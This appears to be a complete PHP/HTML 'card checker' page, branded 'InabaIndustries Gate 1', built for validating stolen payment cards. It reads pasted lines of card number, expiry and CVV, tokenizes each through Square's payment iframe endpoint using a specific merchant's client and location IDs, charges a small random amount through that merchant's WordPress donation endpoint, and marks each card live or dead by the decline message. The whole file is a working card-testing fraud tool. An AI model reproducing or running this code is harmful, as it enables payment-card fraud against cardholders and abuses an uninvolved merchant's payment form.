ytkXtdfS

1<html>
2<head>
3    <title>InabaIndustries - Gate1</title>
4</head>
5<link href="https://fonts.googleapis.com/css?family=Ubuntu+Mono&display=swap" rel="stylesheet">
6<style>
7body {
8	color: white;
9	font-family: 'Ubuntu Mono', monospace;
10}
11
12p {
13	line-height: 45px;
14	color: #c3c3c3;
15}
16
17.databox {
18	color: #c3c3c3;
19	margin-left:auto;
20	margin-right:auto;
21	width: 80%;
22	background-color: rgba(0, 0, 0, 0.45);
23	padding: 25px 50px 50px 50px;
24	margin-top: 25px;
25}
26
27table, th, td {
28	border: 1px solid #c3c3c3;
29	border-collapse: collapse;
30}
31th, td {
32	padding: 5px;
33	text-align: left;
34}
35#cclist{
36	background-color: #fff;
37	width: 100%;
38	height: 200px;
39	resize: none;
40}
41input[type="submit"]{
42	width: auto;
43	height: 35px;
44	padding: 5px 25px;
45	margin-left:10px;
46}
47button{
48	width: auto;
49	height: 35px;
50	padding: 5px 25px;
51	border-radius: 3px;
52	margin-left:10px;
53}
54#cc-check{
55	background-color: #bf00ff;
56	color: #fff;
57	border: 1px solid #bf00ff;
58	float: right;
59}
60</style>
61<body bgcolor="black">
62<?php
63function get_string_between($string, $start, $end){
64    $string = ' ' . $string;
65    $ini = strpos($string, $start);
66    if ($ini == 0) return '';
67    $ini += strlen($start);
68    $len = strpos($string, $end, $ini) - $ini;
69    return substr($string, $ini, $len);
70}
71
72function nibba($ccnum, $ccmonth, $ccyear, $ccv, $zip){
73    $cardnfo = "$ccnum|$ccmonth|$ccyear|$ccv [Eientewi]";
74	$amount = rand (1.00*10, 2.0*10) / 10;
75    $register = curl_init();
76    curl_setopt($register, CURLOPT_URL, 'https://pci-connect.squareup.com/v2/iframe?type=main&app_id=sq0idp-k0r5c0MNIBIkTd5pXmV-tg&location_id=6YA85NGW0H0H5&version=ffb77b668a');
77    curl_setopt($register, CURLOPT_RETURNTRANSFER, 1);
78    curl_setopt($register, CURLOPT_HEADER, 1);
79    curl_setopt($register, CURLOPT_CUSTOMREQUEST, 'GET');
80    curl_setopt($register, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36');
81    //curl_setopt($register, CURLOPT_HTTPHEADER, array("X-Forwarded-For: $ip"));
82    curl_setopt($register, CURLOPT_ENCODING, 'gzip, deflate');
83    $get = curl_exec($register);
84    $header_size = curl_getinfo($register, CURLINFO_HEADER_SIZE);
85    $header = substr($get, 0, $header_size);
86    $body = substr($get, $header_size);
87    $wew = get_string_between($body, 'ni=ei,ri="','",ii=');
88    $cook = get_string_between($header, '_savt=','; Path=');
89    curl_close($register);
90
91    $datajson = array (
92        'client_id' => 'sq0idp-k0r5c0MNIBIkTd5pXmV-tg',
93        'location_id' => '6YA85NGW0H0H5',
94        'session_id' => $wew,
95        'website_url' => 'https://carrollorganics.com/donate-now/',
96        'squarejs_version' => 'ffb77b668a',
97        'analytics_token' => '',
98        'card_data' =>
99            array (
100                'number' => $ccnum,
101                'exp_month' => (int) $ccmonth,
102                'exp_year' => (int) $ccyear,
103                'cvv' => $ccv,
104                'billing_postal_code' => $zip,
105            ),
106    );
107
108    $datapost = json_encode($datajson);
109    $toke = curl_init();
110    curl_setopt($toke, CURLOPT_URL, 'https://pci-connect.squareup.com/v2/card-nonce?version=ffb77b668a');
111    curl_setopt($toke, CURLOPT_RETURNTRANSFER, 1);
112    curl_setopt($toke, CURLOPT_POST, 1);
113    curl_setopt($toke, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36');
114    curl_setopt($toke, CURLOPT_COOKIE, '_savt=' . $cook);
115    curl_setopt($toke, CURLOPT_POSTFIELDS, $datapost);
116    curl_setopt($toke, CURLOPT_ENCODING, 'gzip, deflate');
117    $tokenize = curl_exec($toke);
118    $tokenget = json_decode($tokenize);
119    $token = $tokenget->card_nonce;
120    curl_close($toke);
121
122    $ch2 = curl_init();
123    curl_setopt($ch2, CURLOPT_URL, 'https://carrollorganics.com/wp-admin/admin-ajax.php');
124    curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
125    curl_setopt($ch2, CURLOPT_POST, 1);
126    curl_setopt($ch2, CURLOPT_POSTFIELDS, 'action=wpep_submit_payment&nonce='. $token .'&amount=' . $amount);
127    $getresults = curl_exec($ch2);
128    $finalshit = json_decode($getresults);
129    curl_close($ch2);
130
131    if($finalshit->message == "Card declined."){
132        $dataarray = array(
133            "status" => "dead",
134            "post" => $cardnfo,
135            "amount" => $amount,
136        );
137    }
138    elseif($finalshit->message == "Card verification code check failed."){
139        $dataarray = array(
140            "status" => "live",
141            "post" => $cardnfo,
142            "amount" => $amount,
143        );
144    }
145    elseif($finalshit->message == "Invalid card number."){
146        $dataarray = array(
147            "status" => "dead",
148            "post" => $cardnfo,
149            "amount" => $amount,
150        );
151    }
152    elseif($finalshit->message == "PAYMENT SUCCESSFUL"){
153        $dataarray = array(
154            "status" => "live",
155            "post" => $cardnfo,
156        );
157    }
158    else{
159        $dataarray = array(
160            "status" => "recheck",
161            "post" => $cardnfo,
162            "amount" => $amount,
163        );
164    }
165    $to_json = json_encode($dataarray);
166    echo $to_json;
167}
168
169if(!empty($_GET['start'])) {
170    if (!empty($_POST['cc-list'])) {
171        $list = explode("\r\n", $_POST['cc-list']);
172        $numcards = count($list);
173        $remote = $_SERVER['REMOTE_ADDR'];
174        echo "<pre>
175  |`-.._____..-'| 
176  :  > .  ,  <  :
177  `./ __`' __ \,'
178   | (|_) (|_) |
179   ; _  .  __  :
180   `.,' - `-. ,'     InabaIndustries Checker
181     `, `_  .'       Total of cards to check: $numcards
182     /       \       IP Address: $remote
183    /         :      Amount for checking: 1 USD
184   :          |_     API: [REDACTED]
185 ,|  .    .  | \    
186: :   \   |  |  :
187|  \   :`-;  ;  |
188:   :  | /  /   ;
189 :-.'  ;'  / _,'`------.
190 `'`''-`'''-'-''--.---  )
191             SSt `----' </pre>
192</br>";
193        $output = '';
194        $currcc = 0;
195        echo 'Logs: </br>';
196        ob_flush();
197        flush();
198        set_time_limit($numcards * 3600);
199        foreach ($list as $key => $cc) {
200            $card = explode("|", $cc)[0];
201            $month = explode("|", $cc)[1];
202            $year = explode("|", $cc)[2];
203            $cvv = explode("|", $cc)[3];
204            ob_start();
205            nibba($card, $month, $year, $cvv, '4114');
206            $output = ob_get_contents();
207            $jsondec = json_decode($output);
208            $currcc++;
209            ob_end_clean();
210            if ($jsondec->status == "dead") {
211                echo '<font style="color: red;">' . $output . " Count : " . $currcc . " Total : " . $numcards . "</font></br>";
212            } elseif ($jsondec->status == "live" || $jsondec->status == "semilive") {
213                echo '<font style="color: green;">' . $output . " Count : " . $currcc . " Total : " . $numcards . "</font></br>";
214            } else {
215                echo '<font style="color: grey;">' . $output . " Count : " . $currcc . " Total : " . $numcards . "</font></br>";
216            }
217            ob_flush();
218            flush();
219        }
220    }
221    else{
222        header('Location: ' . $_SERVER['PHP_SELF']);
223    }
224}
225else{
226    echo '<form action="' . $_SERVER['PHP_SELF'] . '?start=1" method="post">
227    <div class="databox"> 
228    <h1>InabaIndustries Gate 1</h1>
229    <textarea name="cc-list" id="cclist"></textarea>
230    <div class="button">
231    <input type="submit" id="cc-check" value="Check">
232    </div>
233    </div>
234    </form>';
235}
236?>
237</body>
238</html>